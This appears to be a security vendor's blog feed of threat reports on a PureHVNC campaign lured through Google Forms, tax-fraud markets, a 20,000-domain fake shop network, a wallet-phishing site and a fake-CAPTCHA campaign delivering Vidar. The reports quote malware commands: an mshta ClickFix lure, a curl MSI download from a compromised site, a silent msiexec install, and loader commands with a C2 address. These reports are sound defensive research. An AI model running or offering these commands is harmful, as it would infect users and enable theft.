Normal view

That “job brief” on Google Forms could infect your device

20 March 2026 at 12:38

We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial document, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).

It’s not the malware that’s new, but how the attack starts.

Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.

What is PureHVNC?

PureHVNC is a modular .NET RAT from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information.

Once installed, it can:

  • Take control of the system and run commands remotely.
  • Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.
  • Steal data from browsers, extensions and crypto wallets.
  • Extract data from apps like Telegram and Foxmail.
  • Install additional plugins.
  • Achieve persistence in several ways (for example, via scheduled tasks).

Different lures, same goal: compromise your device

In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. LinkedIn is one of the platforms used to send links to these malicious forms.

  • Fake Google Forms that distribute malicious ZIPs.
  • The attackers impersonate real companies
  • Well-known brands are impersonated to lend credibility

The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.

  • Information requested from the user to make the form appear legitimate.
    Information requested from the user to make the form appear legitimate.
  • Information requested from the user to make the form appear legitimate.
    More information.

The forms link to ZIP files hosted on:

  • File-sharing services such as Dropbox, filedn.com, and fshare.vn
  • URL shorteners such as tr.ee and goo.su
  • Google redirect links that obscure the final destination

The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for example:

  • {CompanyName}_GlobalLogistics_Ad_Strategy.zip
  • Project_Information_Summary_2026.zip
  • {CompanyName} Project 2026 Interview Materials.zip
  • {CompanyName}_Company_and_Job_Overview.pdf.rar
  • Collaboration Project with {CompanyName} Company 2026.zip

The lures use the names of well-known companies, particularly in the financial, logistic, technology, sustainability and energy sectors. Impersonating legitimate organizations add credibility to their campaign.

What happens after you download the file

The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named msimg32.dll. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.

Legitimate PDFs are present in some ZIP files, like this one pretending to be a job description from a real company.
Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.

Analysis of the malicious campaign

We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.

Example of files present in one of the archives analyzed.
Example of files present in one of the archives analyzed.

The malicious code is present in the DLL, and carries out various operations, including:

  • Decrypting strings with a simple XOR, in this case with the “4B” key.
  • Detecting debugging and sandboxing with IsDebuggerPresent() and time64(), and displaying the error “This software has expired or debugger detected” if triggered.
  • Deleting itself, then dropping and launching a fake PDF.
  • Achieving persistence via the registry key CurrentVersion\Run\Miroupdate.
  • Extracting the “final.zip” archive and running it.

In this case, the PDF was started with the following command:

cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"

The PDF opened during the infection chain.
The PDF opened during the infection chain.

The archive final.zip is unzipped using different commands across the analyzed campaigns into a random folder under ProgramData. In this example, the tar command is used:

cmd.exe /c tar -xf "C:\ProgramData\{random folder}\{random folder \final.zip" -C "C:\ProgramData\{random folder \{random folder} " >nul 2>&1

The zip contains several files associated with Python and the next stage.

Python files compressed into a random folder in ProgramData.
Python files compressed into a random folder in ProgramData.

Next, an obfuscated Python script called config.log is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., image.mp3) and formats in the different chains analyzed.

"C:\ProgramData\{random folder}\{random folder}\pythonw.exe" "C:\ProgramData\{random folder}\{random folder}\config.log"

Obfuscated Python script that ultimately loads the Donut shellcode.
Obfuscated Python script that ultimately loads the Donut shellcode.

At the end of the infection chain, PureHVNC was injected into SearchUI.exe. The injected process may vary across the analyzed samples.

PureHVNC executes the following WMI queries to gather information about the compromised device:

  • SELECT * FROM AntiVirusProduct
  • SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
  • SELECT Caption FROM Win32_OperatingSystem

For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag “-RunLevel Highest” if the user has admin rights.

PowerShell command for the Scheduled Task

PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.

Methods related to wallet and browser data exfiltration.
Methods related to wallet and browser data exfiltration.
Methods related to wallet and browser data exfiltration.

The malware configuration is encoded with base64 and compressed with GZIP.

In this case, the configuration includes:

  • C2: 207.148.66.14
  • C2 ports: 56001, 56002, 56003
  • Campaign ID: Default 
  • Sleeping Flag: 0
  • Persistence Path: APPDATA
  • Mutex Name: Rluukgz 

How to stay safe

Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.

If you deal with job offers, partnerships, or project work online, this is worth paying attention to:

  • Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.
  • Verify requests through official company channels before engaging.
  • Be wary of links hidden behind URL shorteners or redirects.

Indicators of Compromise (IOCs)

IP

207.148.66.14

URL

https://goo[.]su/CmLknt7

https://www.fshare[.]vn/file/F57BN4BZPC8W

https://tr[.].ee/R9y0SK

https://dl.dropbox[.]com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9

HASH

ca6bd16a6185c3823603b1ce751915eaa60fb9dcef91f764bef6410d729d60b3

d6b7ab6e5e46cab2d58eae6b15d06af476e011a0ce8fcb03ba12c0f32b0e6386

e7b9f608a90bf0c1e477a28f41cb6bd2484b997990018b72a87268bf46708320

e221bb31e3539381d4753633443c1595bd28821ab6c4a89ad00ea03b2e98aa00

7f9225a752da4df4ee4066d7937fe169ca9f28ecddffd76aa5151fb72a57d54b

e0ced0ea7b097d000cb23c0234dc41e864d1008052c4ddaeaea85f81b712d07c

b18e0d1b1e59f6e61f0dcab62fecebd8bcf4eb6481ff187083ea5fe5e0183f66

85c07d2935d6626fb96915da177a71d41f3d3a35f7c4b55e5737f64541618d37

b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357

fe398eb8dcf40673ba27b21290b4179d63d51749bc20a605ca01c68ee0eaebbc

1d533963b9148b2671f71d3bee44d8332e429aa9c99eb20063ab9af90901bd4d

c149158f18321badd71d63409d08c8f4d953d9cd4a832a6baca0f22a2d6a3877

83ce196489a2b2d18a8b17cd36818f7538128ed08ca230a92d6ee688cf143a6c

ea4fb511279c1e1fac1829ec2acff7fe194ce887917b9158c3a4ea213abd513a

59362a21e8266e91f535a2c94f3501c33f97dce0be52c64237eb91150eee33e3

a92f553c2d430e2f4114cfadc8e3a468e78bdadc7d8fc5112841c0fdb2009b2a

4957b08665ddbb6a2d7f81bf1d96d252c4d8c1963de228567d6d4c73858803a4

481360f518d076fc0acb671dc10e954e2c3ae7286278dfe0518da39770484e62

8d6bc4e1d0c469022947575cbdb2c5dd22d69f092e696f0693a84bc7df5ae5e0

258adaed24ac6a25000c9c1240bf6834482ef62c22b413614856b8973e11a79f

Pro tip: This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious domains.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Your tax forms sell for $20 on the dark web

19 March 2026 at 12:33

Tax season is also peak season for identity theft. Criminals use stolen personal data to file fake tax returns and claim refunds before the real taxpayer does. Here’s how the fraud works, and how to protect yourself.

What is Stolen Identity Refund Fraud (SIRF)?

Stolen Identity Refund Fraud (SIRF) is a type of tax fraud where criminals steal someone’s personal information—such as a Social Security number and date of birth—and use it to file a fake tax return in that person’s name in order to claim a tax refund.

The fraudsters usually submit the false return early in the tax season before the real taxpayer files, so the refund is issued to them instead of the legitimate person.

The money is often sent to bank accounts, debit cards, or addresses controlled by the criminals. Victims usually discover the fraud only when their real tax return is rejected or when the tax authority, like the US Internal Revenue Service (IRS), reports that a refund has already been issued in their name.

How is it even possible? 

As Americans scramble to meet the annual tax filing deadline, a hidden ecosystem on the Dark Web kicks into overdrive, transforming tax season into a lucrative period of the year for international cybercriminals.  Shahak Shalev, Global Head of Scam and AI Research at Malwarebytes, said:

“People are expecting messages about taxes, refunds, and filings, which makes phishing emails and fake IRS alerts much easier to believe. At the same time, the personal data needed to commit tax fraud is shockingly cheap on the dark web. It’s no surprise scammers treat tax season like an annual opportunity.”

Behind the sudden influx of fraudulent refund claims lies a highly organized criminal supply chain deeply rooted in Russian-language underground forums. These specialized platforms act as the primary enablers of tax fraud.  

Rather than harvesting data from scratch, fraudsters can simply purchase massive datasets of stolen Personally Identifiable Information (PII), complete with ready-to-use W-2 and 1040 forms. For more sophisticated operations, Initial Access Brokers (IABs) auction off direct network access to compromised Certified Public Accountants (CPAs) and accounting firms.  

Beyond raw data and access, this underground economy provides a full suite of “fraud-as-a-service” tools—including on-demand services to forge supporting financial documents and dedicated instructional hubs featuring step-by-step tutorials. 

  • A threat actor looking for partners for US tax refund fraud (based on data from accounting software)
  • The threat actor is selling access to a CPA company with accounting software databases
  • A threat actor looking for partners for US tax refund fraud

The black market of PII 

At the epicenter of this illicit commerce is one of the premier Russian-language underground forums, which serves as the definitive marketplace for fraudsters to buy and offload tax-related PII. The commoditization of this data is staggering in its efficiency, operating much like a traditional e-commerce platform.  

Our research team has captured several compelling samples of this trading activity, highlighting a clear pricing tier based on the freshness of the data and the target demographic. In one recently observed listing, a threat actor advertised a bulk package of 100 complete tax forms for $2,000—effectively pricing a fully documented stolen identity at just $20.  

  • A threat actor offering US tax forms and W-2s for sale
  • A threat actor offering discounted 1040 forms, PII, and bank data for sale 

Conversely, older data dumps from the 2024 tax year are heavily discounted to clear inventory; highly sensitive records specifically belonging to wealthy retirees and pensioners from that period are currently being traded for less than $4 per identity. 

Access for sale 

This staggering volume of tax-related data must originate from somewhere, and threat actors have identified the ultimate jackpot: US companies that handle tax preparation and accounting procedures.  

From an attacker’s perspective, it is infinitely more efficient to breach a dedicated business that serves as a centralized vault for this sensitive information than to cast a wide net trying to trick individual citizens into handing over their personal details. 


See if your personal data has been exposed.


Our research team recently intercepted a prime example of this strategy in action, identifying a Dark Web listing for compromised network access to a US-based tax service firm. The victimized organization is a small business; a typical target of criminals looking for easy access for exploitable information.

Exploiting these systemic weaknesses, the threat actor was able to quietly infiltrate the company’s internal infrastructure and is now auctioning off direct access to a database containing the complete, highly sensitive PII of over 1,600 clients. 

A threat actor auctioning off access to a database of PII of more than 1,600 customers
A threat actor auctioning off access to a database of PII of more than 1,600 customers

Additional data for sale 

Even when threat actors encounter roadblocks during the fraud process—such as a missing piece of PII or a highly specific financial document required for verification—the cybercrime underground offers a comprehensive suite of on-demand services to seamlessly solve these issues.  

Our research team has tracked a dedicated black market known as “Cypher – Fullz and Docs,” which specializes in selling complete, ready-to-use sets of stolen US identities (commonly referred to in the underground as “fullz”) for as little as $0.75 per set.  

  • Advertising stolen data on the dark web
  • Another ad for “fullz” – full identities

However, having the basic data is sometimes not enough to bypass required checks.

When additional paperwork is required to legitimize a fraudulent claim, threat actors simply turn to specialized forgery services like “Fakelab.” For a nominal fee ranging between $20 and $40, Fakelab operates as an illicit digital design studio, meticulously forging any tax-related document an attacker might need, from customized W-2s to realistic bank statement, ensuring the scam can proceed without a hitch. 

  • Advert for documents, including medical and tax forms
  • Price list for data

Tutorials and guidance 

The culmination of the tax fraud lifecycle—and often the most precarious phase for the attacker—is the cashout. To successfully finalize the scam and extract the stolen funds, fraudsters require a robust financial infrastructure, typically relying on compromised “drop” bank accounts and supplementary financial tools designed to launder the money and obscure their tracks.  

Unsurprisingly, the Dark Web ecosystem provides not just the tools but the detailed education necessary to execute this critical phase. Our research team identified a dedicated underground resource known as “Flava,” which serves as a centralized instructional hub. This platform is brimming with comprehensive, step-by-step tutorials specifically detailing how to orchestrate these complex cashout schemes targeting US citizens and residents. 

A Russian-language marketplace related to financial fraud techniques.
A Russian-language marketplace related to financial fraud techniques.

How to stay safe

Stolen Identity Refund Fraud is a reminder that identity theft doesn’t just lead fraudulent purchases. It can impact something as fundamental as filing your taxes.

Cybercriminals take advantage of underground marketplaces that sell stolen personal data, compromised business access, and tools designed to support fraud. It makes it easier for criminals to file fake tax returns quickly and at scale.

For taxpayers, the best defense is limiting the amount of personal data available to criminals, filing your taxes early, and paying attention to any warning signs that someone may be trying to use your identity.

Tax fraud often depends on criminals getting access to your personal information first. The less data they have, the harder it is for them to impersonate you. Here are some steps that can help reduce your risk:

  • File your taxes early. Submitting your legitimate tax return early makes it much harder for criminals to file one in your name first.
  • Protect your Social Security number. Avoid sharing your Social Security number unless it’s absolutely necessary.
  • Watch out for phishing emails and texts. Scammers often pose as the IRS, banks, or tax services to trick people into revealing personal data.
  • Use strong, unique passwords. If criminals gain access to your email or financial accounts, they may be able to collect the information needed to impersonate you.
  • Monitor your accounts and credit reports. Unexpected tax notices, rejected returns, or unfamiliar financial activity can all be warning signs of identity theft.
  • Consider an IRS Identity Protection PIN (IP PIN). An IP PIN adds an extra verification step when filing your tax return, helping prevent criminals from filing in your name.

Note: These dark web screenshots have been roughly translated from Russian. 


What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

Inside a network of 20,000+ fake shops

18 March 2026 at 09:51

We mapped a sprawling fake shop operation of over 20,000 domains, dozens of shared IP addresses and identical storefronts with different names pasted on top. They exist for one purpose: to steal your payment details and personal data. The thread that ties them all together is a browser tab title most people would never think twice about: “Unrivaled selection only for you.

Polished storefronts, empty warehouses

Fake shops are fraudulent websites designed to look and feel like legitimate online retailers. They have product listings, brand logos, customer reviews, shopping carts, and functional-looking checkout pages. They just never deliver what they promise. In some cases, victims receive nothing at all. In others, they get a cheap knockoff worth a fraction of the advertised price.

Either way, the product being sold is your data: these fake shops harvest your payment credentials, billing addresses, and personal details and then resell them on criminal marketplaces or use them directly for identity fraud.

The scale of the problem has exploded. According to recent threat intelligence data, fake e-shop scams rose by 790% in the first quarter of 2025 compared to the same period the year before, driven in part by economic anxiety around trade tariffs pushing consumers toward bargain alternatives.

During the 2024 holiday season alone, researchers identified over 80,000 fake stores, many of which disappeared or rebranded within days. Industry telemetry from late 2025 found that fake shops accounted for 65% of all threats blocked on social media, with Facebook and YouTube as the primary launchpads.

These operations are increasingly industrialized. Researchers recently documented FraudWear, a coordinated campaign involving over 30,000 fraudulent stores impersonating more than 350 fashion brands worldwide.

Another investigation uncovered BogusBazaar, a franchise-style network where a core team maintained the servers, payment processing, and template infrastructure, while decentralized operators spun up individual shops on top of it. That network processed over a million orders across 75,000 domains since 2021.

Fake shops succeed because they use familiar shopping behavior: clicking on ads, following search results, and landing on polished-looking sites. They layer psychological pressure on top, with limited-time offers, countdown timers, and disappearing stock warnings.

Same storefront, different names

While investigating suspicious e-commerce domains, we identified a cluster of more than 20,000 sites sharing common infrastructure patterns.

Most used the .shop top-level domain (TLD), which has become a favourite among scammers thanks to cheap registration fees and a plausible-looking name. The .shop extension now ranks among the top TLDs associated with spam and malicious activity, according to Cloudflare’s email security data.

Digging into the page source revealed what ties these sites together. All run on WordPress and are powered by Sellvia, a legitimate US-based e-commerce platform that allows users to launch a dropshipping store quickly with ready-made templates, product catalogs, and payment processing.

The storefronts reuse Sellvia’s themes and pull product images from its network. The six “different” templates we observed are really just two base themes with cosmetic variations. Here are some examples, shown in pairs to illustrate how the same template appears under completely different brand names.

Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image

20,000 domains, 36 IP addresses

Behind the visual similarities, these fake shops share a common infrastructure backbone. All 20,000+ domains resolve to a set of just 36 IP addresses.

That level of concentration isn’t typical for legitimate online retailers. It’s a hallmark of bulk fraud operations where one group manages the servers and templates while individual operators spin up domains on top.

Much of this activity clusters around a small number of IP ranges, including blocks in the 207.244.x.x and 23.105.x.x space. That clustering points to a preference for specific hosting providers, and a setup designed for speed: spin up a domain, attach a template, go live.

This mirrors the franchise-style model seen in other fake shop networks. A core group manages the servers, templates, and payment setup, while operators register domains and launch storefronts on top. When one site is flagged or taken down, another takes its place.

But the same clustering is also a weakness. Disrupt a small number of servers, and you can take thousands of sites offline.

How to stay safe from fake shops

These fake shops aren’t independent businesses. They’re part of large, repeatable operations designed to look convincing, move fast, and disappear just as quickly.

If a site feels unfamiliar, rushed, or too good to be true, treat it that way. A few extra seconds of checking can save you from handing over your money and your data to cybercriminals.

  • Use browser protection. Tools like Malwarebytes Browser Guard can block known scam sites before you ever reach checkout.
  • Check the domain carefully. Be cautious with unfamiliar endings like .shop, .top, .store, and .xyz, especially when paired with generic, brand-sounding names. If you’ve never heard of the retailer, that’s your first signal.
  • Be skeptical of deep discounts. If an item is sold out everywhere else but heavily discounted on one unknown site, it’s bait.
  • Watch for copy-paste storefronts. If multiple sites have identical layouts, product images, and banners under different names, they’re likely using the same template. Legitimate stores don’t operate like that.
  • Look for independent reviews. Search the store name with terms like “review” or “scam.” If the only results are the site itself, that tells you something.
  • Don’t ignore your instincts. If something feels off, stop. Don’t enter your payment details just to “see what happens.”
  • Use safer payment methods. Credit cards offer better protection than debit. Virtual cards or payment services can add an extra layer between your details and the seller.

Pro tip: Malwarebytes blocks these domains as fraudulent.

Indicators of Compromise (IOCs)

IP addresses

  • 108[.]59[.]1[.]151
  • 108[.]59[.]12[.]118
  • 108[.]59[.]14[.]13
  • 108[.]59[.]8[.]97
  • 108[.]62[.]0[.]220
  • 108[.]62[.]116[.]82
  • 108[.]62[.]117[.]45
  • 162[.]210[.]195[.]105
  • 162[.]210[.]195[.]113
  • 162[.]210[.]198[.]37
  • 162[.]210[.]199[.]12
  • 162[.]210[.]199[.]183
  • 162[.]210[.]199[.]235
  • 192[.]96[.]200[.]81
  • 198[.]7[.]58[.]168
  • 198[.]7[.]58[.]87
  • 199[.]115[.]115[.]2
  • 207[.]244[.]102[.]13
  • 207[.]244[.]109[.]109
  • 207[.]244[.]126[.]106
  • 207[.]244[.]126[.]19
  • 207[.]244[.]126[.]21
  • 207[.]244[.]67[.]158
  • 207[.]244[.]69[.]201
  • 207[.]244[.]71[.]143
  • 207[.]244[.]89[.]198
  • 207[.]244[.]91[.]203
  • 23[.]105[.]160[.]43
  • 23[.]105[.]172[.]14
  • 23[.]105[.]8[.]15
  • 23[.]105[.]8[.]17
  • 23[.]105[.]8[.]19
  • 23[.]82[.]11[.]26
  • 23[.]82[.]13[.]161
  • 23[.]82[.]13[.]34
  • 5[.]79[.]69[.]45

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Fake Pudgy World site steals your crypto passwords

17 March 2026 at 17:10

A phishing site impersonating the newly-launched Pudgy World browser game is targeting crypto users with a technique that goes well beyond a convincing logo and matching color scheme.

Pudgy World is a free-to-play browser game built around the Pudgy Penguins NFT brand. Players explore a virtual world, customize penguin avatars, and complete quests. But some features are tied to digital collectibles and in-game items stored in cryptocurrency wallets.

That means the official game sometimes asks players to connect a crypto wallet to verify ownership of items or unlock additional features. The phishing site abuses that step: When a visitor selects their wallet on this fake site, it shows what appears to be that wallet’s own unlock screen. To the user, it looks for all the world like the real crypto wallet software they already trust.

Phishing site impersonating the Pudgy World site.
Phishing site impersonating the Pudgy World site.

“Connect your wallet to get started”

The Pudgy Penguins brand has had an extraordinary few months. The penguin NFT project, revived by CEO Luca Netz after he acquired it in 2022, has steadily built one of the most convincing crossover stories in Web3: physical plush toys on Walmart and Target shelves, a mobile game called Pudgy Party that crossed a million downloads, and a browser-based game called Pudgy World that went live on 10 March 2026 to immediate viral attention.

The official game asks players to connect a crypto wallet to get started. That text: “Connect your wallet to get started” is now appearing, verbatim, on a site that has nothing to do with Pudgy Penguins.

The domain in question is pudgypengu-gamegifts[.]live. It is not affiliated with Igloo Inc., the company behind Pudgy Penguins, in any way. The site reproduces the official game’s icy background artwork, the Pudgy Penguins logo, and the brand’s characteristic blue-and-white color palette with enough fidelity that a user arriving during the excitement of a new game launch would have no obvious reason for suspicion.

Eleven wallets, eleven convincing forgeries

Selecting a wallet here triggers the fake wallet interface.
Selecting a wallet here triggers the fake wallet interface.

Clicking the CONNECT button opens a dark-themed pop-up window built to resemble the Reown WalletConnect connection kit—the open-source library that the real Pudgy World site uses to handle wallet connections. The modal even displays the “reown” and “Manual Kit” tab labels at the top, matching the genuine component.

Inside is a list of supported wallets:

MetaMask (marked “RECOMMENDED”), Trust Wallet, Coinbase Wallet, Ledger, Trezor Wallet, Phantom Wallet, Rabby Wallet, OKX Wallet, Magic Eden, Solflare, and Uniswap Wallet.

The attack becomes technically interesting at the next step.

Selecting a software wallet does not redirect the user to another page or open an external site. Instead, the page renders an overlay designed to look like the wallet’s actual browser extension unlock screen. The overlay appears at the edge of the browser viewport right where a real extension popup would appear.

Hardware wallet flows behave differently. Selecting Trezor Wallet opens a center-screen dialog mimicking the Trezor Connect interface, rather than a corner overlay. In both cases, the result is that the user believes they are looking at their own installed software, when they are in fact looking at a webpage element controlled by the attacker.

The forgery sits exactly where your real extension would

For every browser extension wallet on the list, the phishing site renders an unlock screen built to match the real extension’s own visual identity, with the correct logo, color scheme, button layout, and wording.

The screenshots below show the forgeries alongside the genuine extensions. The differences are not visible to someone who is not looking for them.

  • Fake extension
    Fake extension
  • Real extension
    Real extension
  • Fake extension
    Fake extension
  • Real extension
    Real extension

  • Fake site
    Fake extension
  • Real extension
    Real extension

Hardware wallet users are not exempt, and the targeting of Trezor is particularly telling.

Trezor devices are typically owned by people who have been in crypto long enough to invest in dedicated security hardware. In other words, users likely holding higher-value accounts.

Selecting Trezor Wallet on the phishing site triggers a dialog that closely mimics the Trezor Connect bridge interface. At the same time, the browser displays a native USB device permission prompt—the operating system’s own dialog, triggered by a WebUSB API call—reading “pudgypengu-gamegifts.live wants to connect.”

The prompt says “No compatible devices found” if no Trezor is plugged in, but the sequence is designed to look like a genuine hardware handshake.

A user who plugs in their Trezor at this point and approves the USB permission has granted the phishing site access to the device bridge.

For those without a device to hand, the dialog offers another option: “Use an alternative connection method.” That path is likely where the most damage is done. A user who cannot get the hardware flow to work and falls back to a manual option is one step away from being asked to type in their seed phrase, the master key to everything in their wallet, directly into a field the attacker controls.

“No compatible devices found.”

The page that plays dead for researchers

The phishing page is more cautious than it first appears.

Embedded in the site is an obfuscated JavaScript loader, its real contents compressed and hidden behind multiple layers of encoding, that performs a series of checks before doing anything visible.

First, it tests whether the browser is being driven by an automated tool of the kind security researchers and sandboxes use to analyse suspicious pages in bulk. If it detects one, it quietly stops and the page appears clean.

Next, it reads the graphics hardware identifier to determine whether it is running inside a virtual machine, which is another common analysis environment.

Only once it is satisfied that a real user is present does it request a second, larger payload from the attacker’s server. That payload contains the code responsible for credential theft.

Even that request contains a safeguard. If the server response is smaller than 500 KB (the kind of placeholder response a security vendor might serve to a known malicious domain), the loader discards it and does nothing.

The practical consequence of all this is that automated scanning tools are likely to rate the initial page as benign, because on their infrastructure, it behaves like one. The malicious functionality never loads unless the attacker’s server decides the visitor is worth targeting.

Why this campaign targets Pudgy players

The timing seems to be deliberate. Pudgy World launched on March 10, 2026, and the phishing campaign appears to have been active around the same window. New players arriving at the game for the first time are walking through a Web3 onboarding flow they have never experienced before.

The legitimate “connect your wallet” step on the official site teaches users that this behaviour is normal. The phishing site then exploits that expectation before experience can challenge it.

The range of wallets targeted is also significant. The campaign leaves almost no wallet blind spot. Whether the victim holds Ethereum, Solana, or multi-chain assets, there is a convincing forgery waiting for them. Building 11 wallet-specific UI forgeries is not a trivial undertaking. It points either to a well-resourced threat actor or, more likely, to the reuse of a commercial phishing kit built for precisely this class of attack.

What to do if you may have been affected

Crypto phishing campaigns have long relied on fake airdrops and fake MetaMask pages. This campaign stands out for how precisely it imitates a wallet’s unlock screen, placing the prompt exactly where a real extension pop-up would appear and exploiting users’ muscle memory.

The attack also piggybacks on Pudgy World’s launch. As Web3 products reach wider audiences, they attract attackers targeting users unfamiliar with wallet security.

One rule still holds: a website can never display your real browser extension unlock screen.

  • If you entered your MetaMask, Coinbase Wallet, or any other software wallet password on this site, change your password immediately by unlocking the extension normally and going to Settings. Consider transferring assets to a new wallet address whose seed phrase has never been used on any website.
  • If you approved the USB device permission prompt for Trezor, disconnect your device and review your Trezor Suite connection history. A WebUSB connection alone does not expose your seed phrase, but it can allow a malicious page to communicate with the bridge. Revoke the permission in your browser’s site settings immediately.
  • Bookmark the official Pudgy Penguins site (pudgypenguins.com) and the official game URL. Navigate to it directly from that bookmark, never from a link in Discord, Twitter, or a direct message.
  • Install a browser extension that flags known phishing domains before you interact with them. Malwarebytes Browser Guard will block this domain.
  • Remind yourself of this rule: your wallet’s unlock screen always appears in the bar at the very top of the window, not inside the page itself. Any page that appears to show you your wallet’s password prompt inside the page content is a phishing site.

Indicators of Compromise (IOCs)

Domains

  • pudgypengu-gamegifts[.]live

Hacked sites deliver Vidar infostealer to Windows users

16 March 2026 at 18:15

In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.

Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.

One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.

What is Vidar?

Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:

  • Browser-stored usernames and passwords
  • Cryptocurrency wallet information
  • Session cookies and authentication tokens
  • Autofill data and saved payment information
  • Files that may contain sensitive data

Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.

Fake CAPTCHA: the never-ending story

When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.

This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.

Verify you are human
The fake CAPTCHA message shown to the user.

The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:

mshta https://{compromised website}/challenge/cf

Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.

In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.

HTA-based MSI dropper

The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.

The script performs several operations:

  • The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
  • The script terminates if the document.location.href doesn’t start with http.
  • The strings are decoded using XOR and a random key.
  • Through WMI queries, the script checks for installed antivirus products.
  • It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
  • In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script
The malicious HTA script.

In this case, the malicious MSI was downloaded using the following command:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Afterward, the malicious MSI was executed with:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI and GoLang loader

The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.

Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.

In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.

The custom action defined in the MSI.
The custom action defined in the MSI.

The Golang loader decodes a shellcode that performs different anti-analysis checks, including:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.

Analysis of compromised websites

The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.

The malicious iframe injected into the compromised website.
The malicious iframe injected into the compromised website.

The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.

Code injected into the compromised websites.
Code injected into the compromised websites.

Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.

The injected script performs several actions:

  • Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
  • Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
  • During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
  • Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
The malicious code injected in the compromised WordPress site.

How to stay safe

Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.

  • Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
